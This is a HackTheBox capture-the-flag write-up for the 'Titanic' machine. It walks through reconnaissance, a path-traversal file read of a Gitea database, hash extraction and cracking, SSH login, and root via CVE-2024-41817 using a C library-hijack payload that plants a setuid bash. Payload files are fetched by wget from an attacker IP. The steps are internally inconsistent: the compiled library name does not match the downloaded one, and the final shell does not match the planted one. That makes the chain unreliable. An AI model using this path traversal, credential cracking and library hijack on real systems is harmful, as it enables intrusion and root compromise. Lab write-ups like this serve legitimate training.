Web · Easy · Linux

HTB — Titanic

A path traversal in the Flask app's download endpoint allows reading arbitrary files, including admin credentials. The ImageMagick `magick` binary, vulnerable to CVE-2024-41817, is then used to obtain a root shell.

February 16, 2025 · HackTheBox
#PathTraversal #Flask #ImageMagick #CVE-2024-41817

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 09:34 EST
Nmap scan report for 10.10.11.55
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/16%OT=22%CT=1%CU=43791%PV=Y%DS=2%DC=T%G=Y%TM=67B1
OS:F78B%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=FB%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   21.32 ms 10.10.14.1
2   22.25 ms 10.10.11.55
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds
sh
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 09:36 EST
Nmap scan report for 10.10.11.55
Host is up (0.018s latency).
 
PORT    STATE  SERVICE  VERSION
22/udp  closed ssh
53/udp  closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp closed asf-rmcp
993/udp closed imaps
995/udp closed pop3s

80

sh
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/

LFI (arbitrary file read)

vhost fuzzing

sh
ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://titanic.htb -H 'Host: FUZZ.titanic.htb' -fc 301
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://titanic.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.titanic.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________
 
dev                     [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 31ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:03] :: Errors: 0 :

dev.titanic.htb

Gitea config files / gitea.db — the download endpoint's `ticket` parameter is not restricted to the intended directory, so Gitea's SQLite database can be fetched directly:

sh
GET /download?ticket=/home/developer/gitea/data/gitea/gitea.db HTTP/1.1
  • save the response body to disk as gitea.db
sh
sqlite> select * from user;
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c...|2d149e5f...|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e7063...|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07f...|8bf3e345...|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e...|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
sqlite> exit
Program interrupted.

Hashcat's example-hashes page gives the PBKDF2 format as `name:sha256:iterations:base64(salt):base64(digest)`; the following one-liner rewrites the Gitea rows (hex-encoded digest and salt) into that form:

sh
sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

Cracking the Gitea hash

sh
hashcat  developer_hash.txt /usr/share/wordlists/rockyou.txt --user
 
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

ssh as developer

sh
ssh developer@10.10.11.55
25282528
 
-bash-5.1$ whoami
developer

user.txt

sh
-bash-5.1$ cat user.txt
4042f825...

Privilege escalation

sh
-bash-5.1$ /usr/bin/magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
sh
-bash-5.1$ wget http://10.10.14.6/image.png
sh
strace /usr/bin/magick
openat(AT_FDCWD, "/tmp/.mount_magick55It79/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
c
#include <stdio.h>
#include <stdlib.h>
/*
 * Constructor payload used in the write-up's CVE-2024-41817 step.
 * Per that CVE, the ImageMagick 7.1.1-35 AppImage resolves shared libraries
 * from a search path that includes an attacker-writable location (the
 * strace line above shows the AppImage mount under /tmp/.mount_magick*
 * probing for libraries), so a crafted .so placed there is mapped into the
 * magick process and this constructor runs before main().
 *
 * Note: setresuid(0,0,0) does not escalate by itself; it only succeeds when
 * the loading process already runs as root. The write-up does not show what
 * invokes magick as root -- presumably a root-owned job (the cleanup.sh /
 * revert.sh files in /root hint at one) -- unverified.
 *
 * Defender view: the fix is upgrading ImageMagick beyond the affected
 * release; detection signals are a root process mapping a .so from an
 * unexpected directory and a setuid copy of bash appearing under /tmp.
 */
static void hijack() __attribute__((constructor));
void hijack() {
	/* presumably so that the shell spawned by system() below does not inherit
	 * the hijacked library path -- the write-up does not say */
	unsetenv("LD_LIBRARY_PATH");
	/* becomes real/effective/saved uid 0 -- only works if already privileged */
	setresuid(0,0,0);
	/* leaves a setuid-root bash in /tmp for later use */
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash");
}
sh
-bash-5.1$ wget http://10.10.14.6/libc.so.6
sh
gcc -o libxcb.so.1 -shared -fPIC library_path.c
sh
-bash-5.1$ /usr/bin/bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
cleanup.sh  images  revert.sh  root.txt  snap
bash-5.1# cat root.txt
f9274ff3...